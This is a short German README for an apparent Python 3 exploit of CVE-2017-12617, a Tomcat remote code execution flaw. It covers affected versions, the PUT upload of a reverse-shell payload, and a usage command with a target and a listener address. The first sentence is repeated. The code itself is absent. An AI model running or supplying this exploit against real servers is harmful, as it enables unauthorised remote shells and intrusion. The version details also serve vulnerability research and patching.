
CVE-2017-12617 ist eine kritische Schwachstelle, die zu Remote Code Execution (RCE) in Apache Tomcat führt.
CVE-2017-12617 ist eine kritische Schwachstelle, die zu Remote Code Execution (RCE) in Apache Tomcat führt.
Diese Schwachstelle betrifft die Versionen 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81.
Getestet nur auf 8.0.24. Die Schwachstelle nutzt eine Fehlkonfiguration der PUT-Option in der Anwendung oder der Tomcat-Instanz selbst.
Sie verwendet PUT, um eine Reverse-Shell-Payload an den Server zu senden und auszuführen, während mit netcat gelauscht wird.
Da es im Internet viele Versionen desselben Exploits gibt, die jedoch auf Python2 basieren, habe ich ihn neu geschrieben, damit er mit Python 3 funktioniert.
Viel Spaß.
Anwendungsbeispiel:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
